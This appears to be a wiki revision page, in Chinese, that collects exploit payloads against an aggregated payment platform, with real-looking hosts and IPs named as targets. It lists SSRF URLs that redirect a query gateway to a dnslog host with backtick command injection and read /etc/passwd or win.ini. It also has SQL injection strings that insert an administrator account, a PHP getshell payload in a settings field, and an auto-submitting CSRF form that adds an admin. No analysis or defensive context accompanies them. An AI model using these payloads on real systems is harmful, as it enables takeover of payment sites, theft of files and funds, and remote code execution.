Difference between revisions of "全版本聚合支付漏洞"
(建立內容為「http://47.104.233.93/Payment_Index_batchQuery ==SSRF== http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.…」的新頁面) |
|||
| Line 1: | Line 1: | ||
| + | ==Vul== | ||
| + | |||
http://47.104.233.93/Payment_Index_batchQuery | http://47.104.233.93/Payment_Index_batchQuery | ||
Revision as of 16:00, 26 February 2021
SSRF
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123 o7xva.l.dnslog.io/`file`
file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini
SQL注入添加管理員用戶
index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+
SQL注入(需要代理賬戶
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry DATA: id=123&name=_log ; insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27101%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+
insert into pay_admin (`id`,`username`,`password`,`groupid`) values ('101','ok','7aa5e695be95cdd64a88410a64dfe2c1','1');--+
http://vip.qhkjpay.cn/conn.php
SQL注入(payload和上面相同)
index.php?m=user&c=api&a=ajaxGetIndustry
后台Getshell
manage_System_base.html ',@copy($_REQUEST[x],$_REQUEST[c]),//
SQL報錯注入(API支付)
Pay_Pay_getSignkey?code=123*&merid=222
CSRF添加管理員
<html lang="en">
<body onload="document.forms[0].submit();">
<form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post">
<input type="hidden" name="username" value="ok179">
<input type="hidden" name="password" value="test123">
<input type="hidden" name="reppassword" value="test123">
<input type="hidden" name="groupid" value="1">
</body>
</html>
